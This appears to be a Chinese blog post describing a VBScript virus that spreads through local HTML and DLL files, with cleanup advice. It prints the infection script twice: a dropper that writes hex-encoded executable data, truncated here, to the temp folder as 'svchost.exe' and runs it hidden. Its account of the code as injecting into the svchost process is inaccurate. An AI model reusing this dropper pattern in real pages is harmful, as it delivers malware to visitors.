<SCRIPT Language=VBScript>
DropFileName = “svchost.exe”
WriteData =
“4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
一串VB脚本的JS
- <SCRIPT Language=VBScript>
- DropFileName = “svchost.exe”
- WriteData =
- “4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”
- Set FSO = CreateObject("Scripting.FileSystemObject")
- DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
- If FSO.FileExists(DropPath)=False Then
- Set FileObj = FSO.CreateTextFile(DropPath, True)
- For i = 1 To Len(WriteData) Step 2
- FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
- Next
- FileObj.Close
- End If
- Set WSHshell = CreateObject("WScript.Shell")
- WSHshell.Run DropPath, 0
- //--></SCRIPT>
这串script代码是一串vbs语言的病毒,中了改病毒后你会发现你的本地所有html文档打开后都会有这样一串字符,不仅仅是html文档,连dll文档也会被感染。
当然这种病毒不要太惊慌,因为他只是起到破坏文件的作用,不会有上传隐私,盗号等危害。
这串代码大概意思就是找到svchost.exe这个进程然后注入数据运行,注入的就是后面的进制代码来运行。
这种病毒和其他病毒不同的是这种vbs病毒感染能力非常强,html文件一旦被感染,那么用户只要打开html文档病毒就运行上面改代码导致病毒直接感染到本地电脑全部html文件和dll文件,
的确 DLL文件也会呗感染 部分软件可以正常使用 不过杀毒软件会报毒
而且你会发现你运行很多常用软件都会报毒,比如以前常用的迅雷丶酷狗等等一些常用的软件你再打开的时候居然提示都有病毒,当时我就觉得特别奇怪,迅雷是在官网下载的怎么可能会报毒呢?
所以这里的原因就是vbs病毒感染了迅雷等软件的安装文件中的dll,所以杀毒软件会不停的报毒,报毒名称也是vbs脚本病毒。
解决方法:
1不想折腾直接装系统。并且删除除c盘以外的其他绿色软件或是游戏等。本人强烈推荐格盘 因为 你其他盘被感染 装系统只是C盘文件 再浏览其他盘文件 有可能二次感染。
2用360杀毒,但是要切记,杀毒一定要杀2次,第二次杀毒要在安全模式下执行杀毒,因为安全模式中注入木马的进程一般都是不再运行的才能彻底。
3用查找删除工具全盘查找后缀名为html和dll的文件并批量删除。
博主的解决方法如下:
步骤是这样的
1->重新安装系统其他盘里面的文件 重要的html文件或者是txt文件 保留 DLL就别要了
2->安装完系统以后 啥也不访问不动 然后 进入PE系统 下载一个软件 ultrareplace 下载地址:http://www.xiazaiba.com/html/4475.html
3->替换完毕的文件复制到C盘 (在保证容量够的情况下 )然后把其他盘格式化掉OK!
如果有C大神 可以自己写特征码 清除工具。